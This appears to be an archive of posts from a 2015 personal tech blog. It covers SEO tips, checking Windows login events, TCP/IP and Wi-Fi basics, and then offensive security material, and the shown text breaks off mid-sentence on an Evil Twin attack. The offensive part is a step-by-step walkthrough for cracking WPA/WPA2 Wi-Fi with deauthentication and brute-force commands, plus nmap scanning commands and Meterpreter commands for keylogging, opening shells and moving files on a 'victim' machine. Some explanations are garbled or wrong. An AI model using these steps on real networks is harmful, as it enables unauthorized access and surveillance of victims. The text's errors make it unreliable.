Sunday, July 19, 2015

Search engine optimization or SEO



Search engine optimization or SEO is the hottest way to drive targeted traffic to your website. Maximizing the benefits of a well optimized website will yield lots of earnings for the marketer. However, optimizing your site might cost you thousands of dollars if you are not skilled in this area.

But to tell you the truth, you can essentially get information on low cost SEO anywhere in the Internet. But only several really show you how to work out an affordable search engine optimization endeavor. And those few that really inform include this article. 

Keyword Research Tools
-------------------------------
You must do keyword research before you start optimizing your site, that much is obvious, but what tools should you use?
There are two excellent keyword research tools that I can recommend as professional tools. They are Wordtracker and Keyword Discovery. Both are great and both are different. Firstly start with with Wordtracker and then move over to Keyword Discovery after a year or so.

If you optimize a site with the wrong keywords you may end up with a high ranking site but won't convert your traffic! Correctly identifying the best keywords and search terms using a keyword search tool will help your odds of success and give you a fighting chance to target prospects who are more likely to turn into clients.

Check it out if you would like more information.
1. http://www.wordtracker.com/
2. http://www.keyworddiscovery.com/
3. http://www.seoscribe.com/

Use The META Description Tag
----------------------------------------
All websites should use the HTML description tag. If you have too many pages to add it to, at least put in on your home page and any core pages that bring in search result traffic. Google will use the META description you place on your site if the user searched for a keyword that exists in the META description. Google is giving us some measure of control.

Create a Website Sitemap

-------------------------------
Some SEO tips can be hard to explain, but this is one of the few that is relatively easy to do and can be done manually with small or large sites. Create a sitemap of your website. There are a few good reasons to do this.
It allows easier indexing of your site by the search engines.
In other words, it helps the search engines to find all the pages on your site. Some websites only have a few of their pages in the search engines and this can be due to poor linking, sparse navigation or a host of other reasons.
It provides PageRank or link popularity to all pages it links to.
If you read about SEO then you have read how important it is to have high-quality links poiting to your site from the sites.
A sitemap can become another source of quality links with descriptive text for your own pages. Making navigation easier by including a sitemap is just good business sense as well as SEO sense.

Example: http://www.xyz.com/sitemap/


Duplicate Content & URL Canonicalization
-------------------------------------------------------
Before we get into this exclusive tip, let me provide a definition for the term Canonicaliztion.
"It is the process of converting data that has more than one possible representation into a standard canonical representation."
If your site has multiple pages with the same content possibly through a Content Management System(CMS) or through duplicate navigation, or because it actually exists in multiple versions, you could be hurting your search engine ranking results. 

Most often this problem can be found on a site's homepage. For example: Search engines view your homepage as having more than one version. How? take a look at the following urls. All point to the same page, but to the search engines they are different. http://www.yoursite.com, http://yoursite.com, http://yoursite.com/index.html and http://www.yoursite.com/index.html. The search engines may find up to four home pages that have the same content.
While this may not cause your site to be unranked it is certainly not helping and can easily cause poor rankings. That is shame for something that is so easily corrected. Most often this is caused by links pointing to different versions of your site. You can't change all the links coming into your site, but you can use the 301-redirect to solve this by pointing all versions of your homepage to the full url.

You can read more at the following links:
1. http://en.wikipedia.org/wiki/Canonicalization 
2. http://www.bigoakinc.com/blog/how-to-do-a-301-redirect/




Social Bookmarking
-------------------------
Social bookmarking involves saving bookmarks (web addresses) to public Web site such as Digg or Del.icio.us so you can access these bookmarks from any computer connected to the web. Your favorite bookmarks are also available for others to view and follow as well, hence the social aspect. If you wish to create your own social bookmarks, you must register with a social bookmarking site.
Bookmark sites you generally would like to share or feel are valuable, which of course can contain bookmarked web addresses of your own site. If enough people agree with the value of a bookmark you have placed they will bookmark it to and as the popularity grows your site traffic will grow.
Don't abuse this by submitting every page of your site, try to be judicious and think about what pages of your site may be helpful and of interest to other web surfers.

Here are some of the more popular social bookmarking sites:
1. Digg
2. Del.icio.us
3. StumbleUpon
4. Reddit
5. Squidoo

Get To Know Google Services
------------------------------------
What would an SEO Consultant's life be like without Google?
I've listed many services that Google offers and I'm sure you may be a bit surprised at how many different pies the search giant's thumb is actuall in.
Google Webmasters: http://www.google.com/webmasters
Google Analytics:     http://www.google.com/analytics
Google AdSense:       http://www.google.com/adsense
Google Answers:       http://answers.google.com/
Google Blog Search:  http://blogsearch.google.com/
Google Bookmarks:  http://www.google.com/bookmarks
Google Directory:     http://www.google.com/dirhp
Google Groups:         http://groups.google.com/
Google Sitemaps:      http://www.google.com/webmasters/sitemaps/


Search Engine & Directory Submissions

-----------------------------------------------------------
Directories are an easy way to build links because anyone can submit age get listed. Directories can, therefore, be of little use for the same reason. Of course getting in directories can be time consuming but it is a one-time affair and usually worth the time. They provide one-way links which will increase your online presence. Not all directories are created equal and paying for the better ones is often money well spent.

Select the best category for your site and follow the instructions on the submission form carefully. Write your descriptions without sensational text. Descriptions of sites should describe the content of the site concisely and accurately When submitting to directories, make sure to vary anchor text and use keywords in the description and title fields.

Choose the most appropriate category for your site. Finding a category that best matches your site's theme or content will increase traffic from the directory and provide higher quality one-way link to your-site for the search engines to follow.

A few of the more search engine friendly directories for valuable links are the following:
1. http://dir.search.yahoo.com/?fr=yfp-t-501
2. http://www.dmoz.org/
3. http://www.business.com/
4. http://bestoftheweb.com/
5. http://www.avivadirectory.com/


We are providing SEO Services..

Is your website submit to all search engines. ?
Do you have a require keywords according to your website ?
Do you want to do SEO for your website ?

Contact us for more details
mail to pathak.munjal@gmail.com

Find Out If Any One Opens Your Computer Without Your Permission

How to Know Who Logged into your computer and when?

In Windows, there is one in-built too will records all events in your computer called “Event Viewer”. This application records all your computer activities from login to log off etc.

The Event Viewer can be accessed in all Windows Operating system including Windows XP, Vista, Windows 7 and Windows 8.
Here, I”ll show you how to find the login events in Windows 8. To open the Event Viewer, type the eventvwr.msc in Run Command (Open run command Press Win + R Keys ) and press enter.
Now the Event Viewer utility will open, and many logs will be shown to you. To get login events of you computer click Windows logs -> System in the left panel.
The System log will show all the logs from kernel, Wireless network service start. There you can also find out the login event “Winlogon”. Just click the login event to display the properties of that event in the panel below.
In the properties, you can get the much needed information such as Login time, user account, event ID.
Note : If you have found that someone has accessed your computer, change your user password immediately with complex one and scan your computer with Best Antivirus applications and Anti-malware security applications, remove threats if you found.

Friday, July 17, 2015

Learn TCP/IP


                                                             

The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.

For Check Your IP Address..

for see another IP address

Why it works ?
IP-Spoofing works because trusted services only rely on network address based authentication. Since IP is easily duped, address forgery is not difficult.
The main reason is security weakness in the TCP protocol known as sequence number prediction.

How it works ?
To completely understand how ip spoofing can take place, one must examine the structure of the TCP/IP protocol suite. A basic understanding of these headers and network exchanges is crucial to the process..

Internet Protocol (IP) :
It is a network protocol operating at layer 3 (network) of the OSI model. It is a connectionless model, meaning there is no information regarding transaction state, which is used to route packets on a network. Additionally, there is no method in place to ensure that a packet is properly delivered to the destination.
Your Browser and Server use TCP/IP
Browsers and servers use TCP/IP to connect to the Internet.
A browser uses TCP/IP to access a server. A server uses TCP/IP to send HTML back to a browser.
Your E-Mail uses TCP/IP
Your e-mail program uses TCP/IP to connect to the Internet for sending and receiving e-mails.
Your Internet Address is TCP/IP
Your Internet address "192.168.10.14" is a part of the standard TCP/IP protocol (and so is your domain name).


What is TCP/IP?
TCP/IP is the communication protocol for communication between computers on the Internet.
TCP/IP stands for Transmission Control Protocol / Internet Protocol.
TCP/IP defines how electronic devices (like computers) should be connected to the Internet, and how data should be transmitted between them.


Inside TCP/IP
Inside the TCP/IP standard there are several protocols for handling data communication:
  • TCP (Transmission Control Protocol) communication between applications
  • UDP (User Datagram Protocol) simple communication between applications
  • IP (Internet Protocol) communication between computers
  • ICMP (Internet Control Message Protocol) for errors and statistics
  • DHCP (Dynamic Host Configuration Protocol) for dynamic addressing


TCP Uses a Fixed Connection
TCP is for communication between applications.
If one application wants to communicate with another via TCP, it sends a communication request. This request must be sent to an exact address. After a "handshake" between the two applications, TCP will set up a "full-duplex" communication between the two applications.
The "full-duplex" communication will occupy the communication line between the two computers until it is closed by one of the two applications.
UDP is very similar to TCP, but simpler and less reliable.


IP is Connection-Less
IP is for communication between computers.
IP is a "connection-less" communication protocol.
IP does not occupy the communication line between two computers. IP reduces the need for network lines. Each line can be used for communication between many different computers at the same time.
With IP, messages (or other data) are broken up into small independent "packets" and sent between computers via the Internet.
IP is responsible for "routing" each packet to the correct destination.

IP Routers
When an IP packet is sent from a computer, it arrives at an IP router.
The IP router is responsible for "routing" the packet to the correct destination, directly or via another router.
The path the packet will follow might be different from other packets of the same communication. The router is responsible for the right addressing, depending on traffic volume, errors in the network, or other parameters.


Connection-Less Analogy
Communicating via IP is like sending a long letter as a large number of small postcards, each finding its own (often different) way to the receiver.


TCP/IP
TCP/IP is TCP and IP working together.
TCP takes care of the communication between your application software (i.e. your browser) and your network software.
IP takes care of the communication with other computers.
TCP is responsible for breaking data down into IP packets before they are sent, and for assembling the packets when they arrive.
IP is responsible for sending the packets to the correct destination.

IP Addresses
Each computer must have an IP address before it can connect to the Internet.
Each IP packet must have an address before it can be sent to another computer.
IP addess is the identity of computer or website.

Domain Names
A name is much easier to remember than a 12 digit number.
Names used for TCP/IP addresses are called domain names.
google.com is a domain name.
When you address a web site, like http://www.google.com, the name is translated to a number by a Domain Name Server (DNS).
All over the world, DNS servers are connected to the Internet. DNS servers are responsible for translating domain names into TCP/IP addresses.
When a new domain name is registered together with a TCP/IP address, DNS servers all over the world are updated with this information.
TCP - Transmission Control Protocol
TCP is used for transmission of data from an application to the network.
TCP is responsible for breaking data down into IP packets before they are sent, and for assembling the packets when they arrive.


IP - Internet Protocol
IP takes care of the communication with other computers.
IP is responsible for the sending and receiving data packets over the Internet.


HTTP - Hyper Text Transfer Protocol
HTTP takes care of the communication between a web server and a web browser.
HTTP is used for sending requests from a web client (a browser) to a web server, returning web content (web pages) from the server back to the client.


HTTPS - Secure HTTP
HTTPS takes care of secure communication between a web server and a web browser.
HTTPS typically handles credit card transactions and other sensitive data.


SSL - Secure Sockets Layer
The SSL protocol is used for encryption of data for secure data transmission.


SMTP - Simple Mail Transfer Protocol
SMTP is used for transmission of e-mails.


MIME - Multi-purpose Internet Mail Extensions
The MIME protocol lets SMTP transmit multimedia files including voice, audio, and binary data across TCP/IP networks.


IMAP - Internet Message Access Protocol
IMAP is used for storing and retrieving e-mails.


POP - Post Office Protocol
POP is used for downloading e-mails from an e-mail server to a personal computer.


FTP - File Transfer Protocol
FTP takes care of transmission of files between computers.


NTP - Network Time Protocol
NTP is used to synchronize the time (the clock) between computers.


DHCP - Dynamic Host Configuration Protocol
DHCP is used for allocation of dynamic IP addresses to computers in a network.


SNMP - Simple Network Management Protocol
SNMP is used for administration of computer networks.


LDAP - Lightweight Directory Access Protocol
LDAP is used for collecting information about users and e-mail addresses from the internet.


ICMP - Internet Control Message Protocol
ICMP takes care of error-handling in the network.


ARP - Address Resolution Protocol
ARP is used by IP to find the hardware address of a computer network card based on the IP address.


RARP - Reverse Address Resolution Protocol
RARP is used by IP to find the IP address based on the hardware address of a computer network card.


BOOTP - Boot Protocol
BOOTP is used for booting (starting) computers from the network.


PPTP - Point to Point Tunneling Protocol
PPTP is used for setting up a connection (tunnel) between private networks.

When you write an email, you don't use TCP/IP.
When you write an email, you use an email program like Lotus Notes, Microsoft Outlook or Netscape Communicator.


Your Email Program Does
Your email program uses different TCP/IP protocols:
  • It sends your emails using SMTP
  • It can download your emails from an email server using POP
  • It can connect to an email server using IMAP


SMTP - Simple Mail Transfer Protocol
The SMTP protocol is used for the transmission of e-mails. SMTP takes care of sending your email to another computer.
Normally your email is sent to an email server (SMTP server), and then to another server or servers, and finally to its destination.
SMTP can only transmit pure text. It cannot transmit binary data like pictures, sounds or movies.
SMTP uses the MIME protocol to send binary data across TCP/IP networks. The MIME protocol converts binary data to pure text.


POP - Post Office Protocol
The POP protocol is used by email programs (like Microsoft Outlook) to retrieve emails from an email server.
If your email program uses POP, all your emails are downloaded to your email program (also called email client), each time it connects to your email server.


IMAP - Internet Message Access Protocol
The IMAP protocol is used by email programs (like Microsoft Outlook) just like the POP protocol.
The main difference between the IMAP protocol and the POP protocol is that the IMAP protocol will not automatically download all your emails each time your email program connects to your email server.
The IMAP protocol allows you to look through your email messages at the email server before you download them. With IMAP you can choose to download your messages or just delete them. This way IMAP is perfect if you need to connect to your email server from different locations, but only want to download your messages when you are back in your office.

WPA/WPA2 wifi cracking

How to Crack WPA/WPA2 Protected Wi-Fi with dictionary


1.  Start kali linux and open terminal in kali linux.

2.  Type command : airmon-ng
           (Check weather your wireless card is avilable and working properly)

3.  Type command : airmon-ng start wlan0
           (put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)

4.  Type command: airodump-ng mon0
            (command to listen to the wireless network around you and get details about them.)

5.  Type command : airodump-ng –w File name of packet –c Target channel no --bssid BSSID of target name mon0
               (  eg: airodump-ng –w MTNL –c 3 –bssid 11:22:33:44:55:66 mon0)
              (This means airodump-ng has successfully captured the handshake.

6.  Type command: sudo aireplay-ng -0 5–a 11:22:33:44:55:66 mon0
              [Send directed DeAuth (attack is more effective when it is targeted) ].

7.  Type command:   aircrack-ng -w wordlist.lst -b 00:11:22:33:44:55 MTNL.cap
            [ -w=The name of the dictionary file
             -b=The MAC address of the access point
              MTNL.cap=The name of the file that contains the authentication handshake ]

[Note: Default directory for wordlist in linux:  /usr/share/wordlists/rockyou.txt.gz]


Steps to attach dictionery


1. cp /usr/share/wordlists/rockyou.txt.gz  (copy the file to root directory)
2. gunzIP rockyou.txt.gz    (UnzIP the file)
3. mv newrockyou.txt wordlist.lst    (rename the file from newrockyou to wordlist)


How to Crack WPA/WPA2 Protected Wi-Fi without dictionary


1.  Start kali Linux and open terminal in kali Linux.

2.  Type command : airmon-ng
           (Check weather your wireless card is avilable and working properly)

3.  Type command : airmon-ng start wlan0
           (put your wireless card in monitoring mode as wifi crack is possible in monitoring mode only)

4.  Type command: airodump-ng mon0
            (command to listen to the wireless network around you and get details about them.)

5.  Type command : airodump-ng –w File name of packet –c Target channel no  --bssid BSSID of target name mon0
               (  eg: airodump-ng –w MTNL –c 3  - -bssid 11:22:33:44:55:66 mon0)
              (This means airodump-ng has successfully captured the handshake.

6.  Type command: sudo aireplay-ng -0 5–a 11:22:33:44:55:66 mon0
              [Send directed DeAuth (attack is more effective when it is targeted) ].

7.  Type command:crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng  --bssid 11:22:33:44:55 :66  -w  MTNL.cap
              [a).crunch: cruch is used to crack wifi without dictionary as crunch automatically generate the wordlists. working of crunch is similar to brute force attack. It try all possible combination referred by user to crack password.
                b). 8 12=It indicates minimum length of password is 8 and maximum length of password is 12.it generate the wordlist starting  with 8 character and maximum with 12 character.
                c).wordlist contain all lowercase a-z, uppercase A-Z, Number 0-9 as user defined.
                d).-bssid : specifies the target MAC address
                e). MTNL.cap is the handshake file on which client perform attack.

Introduction of wifi

Wi-Fi is the industry name for wireless local area network (WLAN)communication technology related to the IEEE 802.11 family of wireless networking standards.
Wi-Fi technology first became popular with 802.11b, introduced in 1999 and the first standard in that family to enjoy mainstream adoption. Today, Wi-Fi refers to any of the established standards:

802.11a
802.11b
802.11g
802.11n
802.11ac


The Wi-Fi Alliance certifies vendor equipment to ensure 802.11 products on the market follow the various 802.11 specifications.
Consumer versions of Wi-Fi products have additionally maintained backward compatibility.
For example, 802.11b, 802.11g, and 802.11n equipment all can communicate with each other, and mixed Wi-Fi networks with devices running multiple of these standards are commonly referred to as "802.11b/g/n" networks.
802.11ac equipment also communicates with each of these others.
The old 802.11a technology is not compatible with these others and has fallen out of mainstream usage as a result.

Radio Types of wifi


           
802.11

 In 1997, the Institute of Electrical and Electronics Engineers (IEEE) created the first WLAN standard.
They called it 802.11 after the name of the group formed to oversee its development.
Unfortunately, 802.11 only supported a maximum network bandwidth of 2 Mbps - too slow for most applications.
For this reason, ordinary 802.11 wireless products are no longer manufactured.


802.11b

IEEE expanded on the original 802.11 standard in July 1999, creating the 802.11bspecification.
802.11b supports bandwidth up to 11 Mbps, comparable to traditionalEthernet .
802.11b uses the same unregulated radio signaling frequency (2.4 GHz) as the original 802.11 standard. Vendors often prefer using these frequencies to lower their production costs.
Being unregulated, 802.11b gear can incur interference from microwave ovens, cordless phones, and other appliances using the same 2.4 GHz range.
However, by installing 802.11b gear a reasonable distance from other appliances, interference can easily be avoided.

Pros of 802.11b - lowest cost; signal range is good and not easily obstructed
 
Cons of 802.11b - slowest maximum speed; home appliances may interfere on the unregulated frequency band

 
802.11a

While 802.11b was in development, IEEE created a second extension to the original 802.11 standard called 802.11a . Because 802.11b gained in popularity much faster than did 802.11a, some folks believe that 802.11a was created after 802.11b.
 In fact, 802.11a was created at the same time. Due to its higher cost, 802.11a is usually found on business networks whereas 802.11b better serves the home market.
802.11a supports bandwidth up to 54 Mbps and signals in a regulated frequency spectrum around 5 GHz.
This higher frequency compared to 802.11b shortens the range of 802.11a networks.
The higher frequency also means 802.11a signals have more difficulty penetrating walls and other obstructions.
Because 802.11a and 802.11b utilize different frequencies, the two technologies are incompatible with each other. Some vendors offer hybrid 802.11a/b network gear, but these products merely implement the two standards side by side (each connected devices must use one or the other).
Pros of 802.11a - fast maximum speed; regulated frequencies prevent signal interference from other devices
Cons of 802.11a - highest cost; shorter range signal that is more easily obstructed
           

802.11g:

In 2002 and 2003, WLAN products supporting a newer standard called 802.11g emerged on the market.
802.11g attempts to combine the best of both 802.11a and 802.11b.
802.11g supports bandwidth up to 54 Mbps, and it uses the 2.4 Ghz frequency for greater range. 802.11g is backwards compatible with 802.11b, meaning that 802.11g access points will work with 802.11b wireless network adapters and vice versa.
Pros of 802.11g - fast maximum speed; signal range is good and not easily obstructed
Cons of 802.11g - costs more than 802.11b; appliances may interfere on the unregulated signal frequency

 
 802.11n: 

802.11n (also sometimes known as "Wireless N") was designed to improve on 802.11g in the amount of bandwidth supported by utilizing multiple wireless signals and antennas (called MIMO technology) instead of one.
Industry standards groups ratified 802.11n in 2009 with specifications providing for up to 300 Mbps of network bandwidth. 802.11n also offers somewhat better range over earlier Wi-Fi standards due to its increased signal intensity, and it is backward-compatible with 802.11b/g gear.
Pros of 802.11n - fastest maximum speed and best signal range; more resistant to signal interference from outside sources
Cons of 802.11n - standard is not yet finalized; costs more than 802.11g; the use of multiple signals may greatly interfere with nearby 802.11b/g based networks.


802.11ac

The newest generation of Wi-Fi signaling in popular use, 802.11ac utilizes dual band wireless technology, supporting simultaneous connections on both the 2.4 GHz and 5 GHz Wi-Fi bands.
802.11ac offers backward compatibility to 802.11b/g/n and bandwidth rated up to 1300 Mbps on the 5 GHz band plus up to 450 Mbps on 2.4 GHz.


802.11ac

The newest generation of Wi-Fi signaling in popular use, 802.11ac utilizes dual band wireless technology, supporting simultaneous connections on both the 2.4 GHz and 5 GHz Wi-Fi bands. 802.11ac offers backward compatibility to 802.11b/g/n and bandwidth rated up to 1300 Mbps on the 5 GHz band plus up to 450 Mbps on 2.4 GHz.

Other IEEE 802.11 working group standards like 802.11h and 802.11j are extensions or offshoots of Wi-Fi technology that each serve a very specific purpose.

WiMax also was developed separately from Wi-Fi. WiMax is designed for long-range networking (spanning miles or kilometers) as opposed to local area wireless networking.

Information Gathering

Information gathering means collecting as much information as available regarding target networking. Nmap is best tool for collecting information . User can also execute their own script via “Nmap script engine”. Nmap script engine is one of the most powerful feature of nmap.list of nmap command are as below:

1.Nmap  192.168.0.1         (Show the open port of 192.168.0.1)
2.Nmap  192.168.0.1/24   (Show the open port from 192.168.0.1 to 192.168.0.24)
3.Nmap  192.168.0.*         (show the all open port)
4.Nmap –O 192.168.0.1     (check the opeating system of specified internal IP)
5.Nmap  -sP 192.168.0.1/24  (ping the ranged IP address) 
6.Nmap  -T5 192.168.0.1/24  (Quick scan)
7.Nmap  --top-ports 20 192.168.0.1/24  (scan the top 20 ports of ranged network)
8.Nmap  -sT –p80 192.168.0.*   (scan the tcp onnection of port 80)  (-sT=tcp scan,p80 =port 80 )
9.Nmap  -v 192.168.0.1  (for scanning top 1000 port of IP)
10.Nmap  -f  192.168.0.* --exclude 192.168.0.2  (scan the top 100 ports of ranged IP exclude 192.168.0.2


Full form of  command


1. -sT     TCP scan
2. -sS      SYN scanning
3. -sF      FIN scan
4. -sN      Null scan
5. -sX      Tree scan
6. -sP      ping scan
7. -sU      UDP scan
8.  -O       Operating system
9. -sI       Idle scanning
10. -sA     ACK scan
11. -F       fast scan
12. man  nmap -manual page of nmap

Information also collected with the help of zenmap which is graphical version of nmap provide the same feature and accessibility as available in namp.

Note: nmap is important tool with lots of feature  user don’t have to learn the namp command as most of the command starting with the first alphatebate of name. (eg –sT=TCP)

Command For Backtrack

Backtrack Command for beginners


1. ? - help menu
2. background - moves the current session to the background
3. bglist - provides a list of all running background scripts
4. channel - displays active channels
5. close - closes a channel
6. exit - terminates a meterpreter session
7. migrate - moves the active process to a designated PID
8. run - executes the meterpreter script designated after it
9. use - loads a meterpreter extension


Backtrack Command for Network management


1. Ifconfig-Provide the IP address of private network
2. Ifconfig eth0-Display the ethernet adapter
3. ifconfig eth0 down-Disable the adapter
4. ifconfig eth0  192.168.0.1-manually set up the IP address
5. ifconfig eth0 netmask 255.255.255.0-manuall set the subnet mask
6. ifconfig eth0 up-Enable the adapter



Backtrack command for file management


1. cat - read and output to stdout the contents of a file
2. cd - change directory on the victim
3. del - delete a file on the victim
4. download - download a file from the victim system to the attacker system
5. edit - edit a file with vim
6. ls - list files in current directory
7. mkdir - make a directory on the victim system
8. pwd - print working directory
9. rm - delete a file
10. rmdir - remove directory on the victim system
11. upload - upload a file from the attacker system to the victim



Command for exploiting victim computer


1. clear - clears the screen
2. Ifconfig- show the IP address of computer
3. execute - executes a command
4. getpid - gets the current process ID (PID)
5. getuid - get the user that the server is running as
6. kill - terminate the process designated by the PID
7. ps - list running processes
8. reboot - reboots the victim computer
9. reg - interact with the victim's registry
10. shell - opens a command shell on the victim machine
11. shutdown - shuts down the victim's computer
12. sysinfo - gets the details about the victim computer such as OS and name
13. keyscan_start - starts the software keylogger when associated with a process such as Word or browser
14. keyscan_stop - stops the software keylogger
15. keyscan_dump - dumps the contents of the software keylogger
16. screenshot - grabs a screenshot of the meterpreter desktop
17. set_desktop - changes the meterpreter desktop

Evil Twin attack

Evil Twin Attack is attack is frequently carried upon wireless access points with malicious intentions. This attack happens when...